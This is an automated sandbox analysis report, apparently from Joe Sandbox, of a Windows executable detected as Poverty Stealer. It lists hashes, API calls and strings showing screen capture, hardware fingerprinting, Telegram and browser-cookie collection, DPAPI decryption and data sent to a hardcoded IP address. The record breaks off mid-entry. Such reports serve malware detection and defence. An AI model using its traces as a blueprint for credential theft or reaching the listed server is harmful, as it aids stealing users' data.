Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe"
Imagebase:	0x770000
File size:	578'048 bytes
MD5 hash:	DA4B6F39FC024D2383D4BFE7F67F1EE1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PovertyStealer, Description: Yara detected Poverty Stealer, Source: 00000000.00000002.2110344890.00000000012B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PovertyStealer, Description: Yara detected Poverty Stealer, Source: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	23.5%
Signature Coverage:	7.7%
Total number of Nodes:	1432
Total number of Limit Nodes:	85

Executed Functions

Function 00775B80 Relevance: 36.0, APIs: 15, Strings: 1, Instructions: 7953COMMON

Download Yara Rule

Strings

d, xrefs: 00775BA9

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 359e412f215ee98b444bbdcc4d48239925d2217eaf52ca1d7accbfdd9e2e18c1
Instruction ID: c4896b2f679d22bfa9ed979748d0f0373be9973f25d789e49a04df6f8783bf5c
Opcode Fuzzy Hash: 359e412f215ee98b444bbdcc4d48239925d2217eaf52ca1d7accbfdd9e2e18c1
Instruction Fuzzy Hash: 37142471D04A2CCACB66DF28CC916AEB775BF46384F1082C9D50E7A241EB359AD1DF81

Function 038F4BA2 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 208
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 038F46D4: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,038F4812), ref: 038F46E6
Part of subcall function 038F46D4: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,038F4812), ref: 038F46F3

KiUserCallbackDispatcher.NTDLL(0000004C), ref: 038F4C13
GetSystemMetrics.USER32(0000004D), ref: 038F4C1A
GetDC.USER32(00000000), ref: 038F4C55
GetCurrentObject.GDI32(00000000,00000007), ref: 038F4C68
GetObjectW.GDI32(00000000,00000018,?), ref: 038F4C81
DeleteObject.GDI32(00000000), ref: 038F4CB3
CreateCompatibleDC.GDI32(00000000), ref: 038F4D14
CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 038F4D35
SelectObject.GDI32(00000000,00000000), ref: 038F4D47
BitBlt.GDI32(00000000,00000000,00000000,?,038F2468,00000000,?,?,00CC0020), ref: 038F4D6C

Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B

Part of subcall function 038F3D76: EnterCriticalSection.KERNEL32(038F84D4,00000000,00000000,00000000,?,?,?,?,?,038F3EEB,00000000,00000000,00000000,00000000,00000000), ref: 038F3D88

Part of subcall function 038F3536: GetProcessHeap.KERNEL32(00000000,00000000,038F518A), ref: 038F353D
Part of subcall function 038F3536: RtlFreeHeap.NTDLL(00000000), ref: 038F3544

DeleteObject.GDI32(00000000), ref: 038F4E0A
DeleteDC.GDI32(00000000), ref: 038F4E11
ReleaseDC.USER32(00000000,00000000), ref: 038F4E1A

Strings

2, xrefs: 038F4BCA
gdi3, xrefs: 038F4BBE
(, xrefs: 038F4CED
U, xrefs: 038F4BD3
6, xrefs: 038F4CF9
- ScreenSize: {lWidth=%d, lHeight=%d}, xrefs: 038F4C9D
er32, xrefs: 038F4BDA

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Object$HeapSection$CriticalDelete$CreateEnterProcess$AllocateCallbackCompatibleCurrentDispatcherFreeHandleLeaveLibraryLoadMetricsModuleReleaseSelectSystemUser
String ID: ($- ScreenSize: {lWidth=%d, lHeight=%d}$2$6$U$er32$gdi3
API String ID: 1387450592-1028866296
Opcode ID: 2f529775e3c980e0d01bf7ed9ce5a03f3638788d18248d8264e5696719b77070
Instruction ID: 1463def5920e2bb78f7b08fce686880d6082afc9f3313e0aedf12db9c77ee9ba
Opcode Fuzzy Hash: 2f529775e3c980e0d01bf7ed9ce5a03f3638788d18248d8264e5696719b77070
Instruction Fuzzy Hash: E8716B75D00308AFDB21DBE9DC55BAEBB79EF88710F14409AE605EB290DB709A048B65

Function 038F1000 Relevance: 18.2, APIs: 4, Strings: 6, Instructions: 667
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileW.KERNELBASE(?,?), ref: 038F13C7

Part of subcall function 038F407D: GetFileAttributesW.KERNELBASE(038F5051,038F447E,?,?,?,?,?,?,?,?,?,?,?,?,?,038F3ECC), ref: 038F407E

Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B

FindFirstFileW.KERNELBASE(00000000,?,012BFDF0,?), ref: 038F1161

Part of subcall function 038F3EFC: FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 038F3F5D
Part of subcall function 038F3EFC: FindNextFileW.KERNEL32(038F1710,?), ref: 038F3FFE

EnterCriticalSection.KERNEL32(038F84D4), ref: 038F1668
LeaveCriticalSection.KERNEL32(038F84D4), ref: 038F1681

Strings

%s%s, xrefs: 038F1487, 038F17C7, 038F195D, 038F19C2
%s\%s, xrefs: 038F11A2
7a?=, xrefs: 038F16A3
Telegram, xrefs: 038F166E
$Lr, xrefs: 038F1281
%s\*, xrefs: 038F112A

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: File$CriticalFindSection$EnterFirstHeapLeaveNext$AllocateAttributesProcess
String ID: $Lr$%s%s$%s\%s$%s\*$7a?=$Telegram
API String ID: 1893179121-1537637304
Opcode ID: d6e44745cc9ea26c908703abf8f6693d767b063020880988378163a316bcf9a6
Instruction ID: 3013a86b844f3630e50a40cbedfe0fd918b9c2f7192e60f414926cddefdfd054
Opcode Fuzzy Hash: d6e44745cc9ea26c908703abf8f6693d767b063020880988378163a316bcf9a6
Instruction Fuzzy Hash: 6F322965E007149FDF25EBE88848BBDF3B59F94310F1840DAD605EB294EB748E85CB92

Function 038F2054 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B

GetCurrentHwProfileA.ADVAPI32(?), ref: 038F210B
GetSystemInfo.KERNELBASE(?,?,0000011C), ref: 038F2132
GlobalMemoryStatusEx.KERNELBASE(?), ref: 038F2166
EnumDisplayDevicesA.USER32(00000000,00000002,?,00000001), ref: 038F21E8

Strings

- HWID: %s, xrefs: 038F211F
- RAM: %d GB, xrefs: 038F217D
- VideoAdapter #%d: %s, xrefs: 038F21B4
- CPU: %s (%d cores), xrefs: 038F2144
@, xrefs: 038F215D

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CriticalHeapSection$AllocateCurrentDevicesDisplayEnterEnumGlobalInfoLeaveMemoryProcessProfileStatusSystem
String ID: - CPU: %s (%d cores)$- HWID: %s$- RAM: %d GB$- VideoAdapter #%d: %s$@
API String ID: 330852582-565344305
Opcode ID: b94a30f862a5b7794748ba76c252246a964a13e9479ae65fc2b8c02786381db7
Instruction ID: 4db428d2a3600e34c82789d7555bd4873286b43c36f53b8d17e9b52f2c06b673
Opcode Fuzzy Hash: b94a30f862a5b7794748ba76c252246a964a13e9479ae65fc2b8c02786381db7
Instruction Fuzzy Hash: 6D41B2756083059FE721DF58C881FABB7A8EBC8350F0449ADFA85CB241E770D944CBA2

Function 038F4E27 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 286
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000), ref: 038F4ECD
EnterCriticalSection.KERNEL32(038F84D4), ref: 038F4F89

Part of subcall function 038F4E27: LeaveCriticalSection.KERNEL32(038F84D4), ref: 038F4FA6

FindNextFileW.KERNELBASE(?,?), ref: 038F5175

Part of subcall function 038F407D: GetFileAttributesW.KERNELBASE(038F5051,038F447E,?,?,?,?,?,?,?,?,?,?,?,?,?,038F3ECC), ref: 038F407E

Strings

%s\%s, xrefs: 038F4EE7
Telegram, xrefs: 038F4F8F
%s\*, xrefs: 038F4EB7

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: File$CriticalFindSection$AttributesEnterFirstLeaveNext
String ID: %s\%s$%s\*$Telegram
API String ID: 648860119-4994844
Opcode ID: cd68c2d70a3e62e54383de9541b241d1114cbe39e8944c0452110c32dc8c58d8
Instruction ID: 1f7b1b97171410d07009e4afda04bc1d7ab2bb422ba495bcfb539799898626eb
Opcode Fuzzy Hash: cd68c2d70a3e62e54383de9541b241d1114cbe39e8944c0452110c32dc8c58d8
Instruction Fuzzy Hash: 8CA19A25A14748ADEF10EBE4EC45BBEB375EF84710F10509AE604EB2A0F7B14A85875A

Function 038F1D3C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 139
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?), ref: 038F1D83

Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B

FindNextFileW.KERNELBASE(00000000,?), ref: 038F1F07

Strings

%s%s, xrefs: 038F1EC1
%s\%s, xrefs: 038F1E0E
%s\*, xrefs: 038F1D6A

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CriticalFileFindHeapSection$AllocateEnterFirstLeaveNextProcess
String ID: %s%s$%s\%s$%s\*
API String ID: 3555643018-2064654797
Opcode ID: 2502c53f1bdadd10e011cd683d0b49f6ef6bb4c6bf0e55799951f23124db7461
Instruction ID: 513fbe1810cd2b138bcc05ca99616c242aa82c27ad01ec470a9f8090b09c22ed
Opcode Fuzzy Hash: 2502c53f1bdadd10e011cd683d0b49f6ef6bb4c6bf0e55799951f23124db7461
Instruction Fuzzy Hash: DE41E3792047418FCB14EFA8D844A2EB3E4EF94304F04089DEA95CB291EB75CA058797

Function 038F1C94 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 038F46D4: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,038F4812), ref: 038F46E6
Part of subcall function 038F46D4: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,038F4812), ref: 038F46F3

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 038F1CF3
CryptProtectData.CRYPT32(?,?,00000000,00000000,00000000,00000000,?), ref: 038F1D29

Strings

Poverty is the parent of crime., xrefs: 038F1D12
CRYPT32.dll, xrefs: 038F1CC2

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CryptData$HandleLibraryLoadModuleProtectUnprotect
String ID: CRYPT32.dll$Poverty is the parent of crime.
API String ID: 3642467563-1885057629
Opcode ID: 50f42dad1b6fa20d2ff6b840b50d1262d31c18eecdfef8285369bdee27b27a1d
Instruction ID: 450a0df4bb5df56042846b96f9bea7be6b51e216699d1f53293bf0c952f576cd
Opcode Fuzzy Hash: 50f42dad1b6fa20d2ff6b840b50d1262d31c18eecdfef8285369bdee27b27a1d
Instruction Fuzzy Hash: 36113EB5D0020CAFDB10DFD5C884CEEBBBDEF48250F1445A6E905A3240E7745E05CAA0

Function 038F21F5 Relevance: 38.8, APIs: 13, Strings: 9, Instructions: 304
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(038F84D4,00000DA3), ref: 038F220A
CreateMutexA.KERNELBASE(00000000,00000000,1e7f31ac-1494-47cc-9633-054c20e7432e), ref: 038F2222
GetLastError.KERNEL32 ref: 038F2235

Strings

$, xrefs: 038F2570
kernel32, xrefs: 038F23AC
systemd, xrefs: 038F2566
- OperationSystem: %d:%d:%d, xrefs: 038F229D
shell32, xrefs: 038F2358
$d.log, xrefs: 038F25EB
@, xrefs: 038F2551
1e7f31ac-1494-47cc-9633-054c20e7432e, xrefs: 038F2219, 038F2585
- UserAgent: %s, xrefs: 038F2526

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CountCreateCriticalErrorInitializeLastMutexSectionSpin
String ID: $$$d.log$- OperationSystem: %d:%d:%d$- UserAgent: %s$1e7f31ac-1494-47cc-9633-054c20e7432e$@$kernel32$shell32$systemd
API String ID: 2005177960-3436640841
Opcode ID: 025186c03858b4c4f0f06d9789e350f38f9e3a3a24facc8fbae1ded862f9cccf
Instruction ID: e2f8a6065c1aa5d2d7d7c4910dd2deb55fc0c10910fa2da491963c98309a28b9
Opcode Fuzzy Hash: 025186c03858b4c4f0f06d9789e350f38f9e3a3a24facc8fbae1ded862f9cccf
Instruction Fuzzy Hash: 2EC1BE38A04748AFEB11EBE8E809FAD7B75EF55300F0440D9E741EA2D5DBB54A45CB22

Function 038F446C Relevance: 16.7, APIs: 8, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 038F407D: GetFileAttributesW.KERNELBASE(038F5051,038F447E,?,?,?,?,?,?,?,?,?,?,?,?,?,038F3ECC), ref: 038F407E

Part of subcall function 038F3508: EnterCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F3512
Part of subcall function 038F3508: GetProcessHeap.KERNEL32(00000008,00000208,?,?,038F51B7), ref: 038F351B
Part of subcall function 038F3508: RtlAllocateHeap.NTDLL(00000000,?,?,038F51B7), ref: 038F3522
Part of subcall function 038F3508: LeaveCriticalSection.KERNEL32(038F84D4,?,?,038F51B7), ref: 038F352B

EnterCriticalSection.KERNEL32(038F84D4), ref: 038F44F5
LeaveCriticalSection.KERNEL32(038F84D4), ref: 038F4541
EnterCriticalSection.KERNEL32(038F84D4), ref: 038F45C4
LeaveCriticalSection.KERNEL32(038F84D4), ref: 038F45FD
EnterCriticalSection.KERNEL32(038F84D4), ref: 038F463A
LeaveCriticalSection.KERNEL32(038F84D4), ref: 038F467D
EnterCriticalSection.KERNEL32(038F84D4), ref: 038F4696
LeaveCriticalSection.KERNEL32(038F84D4), ref: 038F46BF

Part of subcall function 038F42EC: GetModuleHandleA.KERNEL32(ntdll,NtQuerySystemInformation,00000000,00000000,00000000,?,?,?,?,038F4574), ref: 038F4305
Part of subcall function 038F42EC: GetProcAddress.KERNEL32(00000000), ref: 038F430E
Part of subcall function 038F42EC: GetModuleHandleA.KERNEL32(ntdll,NtQueryObject,?,?,?,?,038F4574), ref: 038F431F
Part of subcall function 038F42EC: GetProcAddress.KERNEL32(00000000), ref: 038F4322
Part of subcall function 038F42EC: OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,?,?,038F4574), ref: 038F43A4
Part of subcall function 038F42EC: GetCurrentProcess.KERNEL32(038F4574,00000000,00000000,00000002,?,?,?,?,038F4574), ref: 038F43C0
Part of subcall function 038F42EC: DuplicateHandle.KERNEL32(?,?,00000000,?,?,?,?,038F4574), ref: 038F43CF
Part of subcall function 038F42EC: CloseHandle.KERNEL32(038F4574,?,?,?,?,038F4574), ref: 038F43FF

Part of subcall function 038F3536: GetProcessHeap.KERNEL32(00000000,00000000,038F518A), ref: 038F353D
Part of subcall function 038F3536: RtlFreeHeap.NTDLL(00000000), ref: 038F3544

Strings

@, xrefs: 038F44DB
\Network\Cookies, xrefs: 038F4561
\??\%s, xrefs: 038F44A4

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$HandleHeapProcess$AddressModuleProc$AllocateAttributesCloseCurrentDuplicateFileFreeOpen
String ID: @$\??\%s$\Network\Cookies
API String ID: 330363434-2791195959
Opcode ID: a6d60ece5ee319b437369cb6ba05a56b43c3c354c19a29261e148e085051a824
Instruction ID: a737cc7a76cc95934728fb0c962d47a8c435c6d19cad6ef00939bc28d4b1d18f
Opcode Fuzzy Hash: a6d60ece5ee319b437369cb6ba05a56b43c3c354c19a29261e148e085051a824
Instruction Fuzzy Hash: F8715A75A40608AFEB44EFD4D849FADBBB5FB48304F108096FA01EA2D1DBB49A45CB51

Function 038F536D Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 138
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 038F46D4: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,038F4812), ref: 038F46E6
Part of subcall function 038F46D4: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,038F4812), ref: 038F46F3

socket.WS2_32(?,00000001,00000000), ref: 038F5480
connect.WS2_32(000000FF,?,00000010), ref: 038F54BF
send.WS2_32(000000FF,00000000,00000000), ref: 038F54E1
send.WS2_32(000000FF,000000FF,00000037,00000000), ref: 038F54FD

Strings

ws2_32.dll, xrefs: 038F53E8
146.70.169.164, xrefs: 038F5494

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: send$HandleLibraryLoadModuleconnectsocket
String ID: 146.70.169.164$ws2_32.dll
API String ID: 2781119014-4085977579
Opcode ID: 40bf6940c2a59249b7d8efd4b3ec1803c5ff1b91bf34732e896b616049e3cd47
Instruction ID: 0a018247816b801c591d8c53c318a76eb7e5d9af4d26a8c5313ae277c43727c2
Opcode Fuzzy Hash: 40bf6940c2a59249b7d8efd4b3ec1803c5ff1b91bf34732e896b616049e3cd47
Instruction Fuzzy Hash: FD518330C04289EEEB11CBE8D809BEDBFB99F16314F144189E660EE1C1C3B54746CB65

Function 0077F990 Relevance: 11.6, APIs: 4, Strings: 1, Instructions: 2890COMMON

Download Yara Rule

Strings

d, xrefs: 0077F999

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 79d5b2422a162a63b8a5afe30036f8331e81c35a5b28bbf06c0772a3851e767b
Instruction ID: 54679a3f8bd3adc9d73c1d9c95d6dbe9786f23d946358f825c2f4d018f9f3939
Opcode Fuzzy Hash: 79d5b2422a162a63b8a5afe30036f8331e81c35a5b28bbf06c0772a3851e767b
Instruction Fuzzy Hash: 1A633471D04A1CCACB22EF68C9916AEF775FF56345F1082C6D40A3A201EB39AAD5DF41

Function 00783FE0 Relevance: 11.2, APIs: 5, Strings: 1, Instructions: 705
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00783FE9

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 246aa282021b39364b9227e0e5728236274c65a6399445ce5fc7c19e63945e6c
Instruction ID: 1ae969a2594188720a34a5b721878621c0a3201d4a4698a9280369f441af61bd
Opcode Fuzzy Hash: 246aa282021b39364b9227e0e5728236274c65a6399445ce5fc7c19e63945e6c
Instruction Fuzzy Hash: 9F725971D00A1DCBCB11EFA4D8856EEF775FF56344F108289E40A7A241EB78AA91DF41

Function 007859F0 Relevance: 10.0, APIs: 2, Strings: 1, Instructions: 5515COMMON

Download Yara Rule

Strings

d, xrefs: 007859F9

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 84987e539f1f7f998e8b423c4d31815661eda737b4081d682830a396011854fe
Instruction ID: 250b1373ac35a6452548307def754ee8022eb163c0579a532c1fe635ec300f1f
Opcode Fuzzy Hash: 84987e539f1f7f998e8b423c4d31815661eda737b4081d682830a396011854fe
Instruction Fuzzy Hash: A3D33471D04A1CCACB26EF68C9916AEF775FF56344F1082CAD40A3A241EB35AAD1DF41

Function 038F484B Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 231
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,0000011C,?,?,?,?,?,038F22C4), ref: 038F486C

Part of subcall function 038F46D4: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,038F4812), ref: 038F46E6
Part of subcall function 038F46D4: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,038F4812), ref: 038F46F3

GetCurrentProcess.KERNEL32(038F22C4), ref: 038F48E0
IsWow64Process.KERNEL32(00000000), ref: 038F48E7

Strings

l, xrefs: 038F488C
ntdl, xrefs: 038F4889

Memory Dump Source

Source File: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38f0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentHandleLibraryLoadModuleVirtualWow64
String ID: l$ntdl
API String ID: 1207166019-924918826
Opcode ID: 6120590783a698053a3689a6bc3495444080c1ad1753c8c36d20b52ecdd8cba4
Instruction ID: e8a00122bfbc5d03d82198b3c26e1dfc3b50599d6a01b9d28a52b4623bbc705c
Opcode Fuzzy Hash: 6120590783a698053a3689a6bc3495444080c1ad1753c8c36d20b52ecdd8cba4
Instruction Fuzzy Hash: D6818031608B049EEB24EAD5E855B7B33A8FB51718F2405DBE309DB3D5E7B4C684870A

Function 007CFCA5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___scrt_release_startup_lock.LIBCMT ref: 007CFCF5
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 007CFD09
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 007CFD2F
___scrt_uninitialize_crt.LIBCMT ref: 007CFD72

Strings

VPWh, xrefs: 007CFD4E

Memory Dump Source

Source File: 00000000.00000002.2110025006.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.2110002083.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110071834.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110095726.00000000007FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110114590.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2110133234.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_SecuriteInfo.jbxd

Similarity

API ID: ___scrt_is_nonwritable_in_current_image$___scrt_release_startup_lock___scrt_uninitialize_crt
String ID: VPWh
API String ID: 3089971210-353207083
Opcode ID: 5c8f9076b44cf1222685ae619e120accb53c93552cde8b84cf73e132d1deab5e
Instruction ID: 3cd6d9689070e8f8127be93ee1ecc9cc89a4a314619f65cc49559952a379ce37
Opcode Fuzzy Hash: 5c8f9076b44cf1222685ae619e120accb53c93552cde8b84cf73e132d1deab5e
Instruction Fuzzy Hash: 50210433604659E6DB257B65AC0EFAE67729F42720F20053FF982673C2DE2E4C018695

Function 00783052 Relevance: 6.0, APIs: 4, Instructions: 32
librarysynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 0078307F
CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 007830A2
WaitForSingleObject.KERNEL32(?,000000FF), ref: 007830B7
FreeLibrary.KERNEL32(?), ref: 007830C4

Memory Dump Source

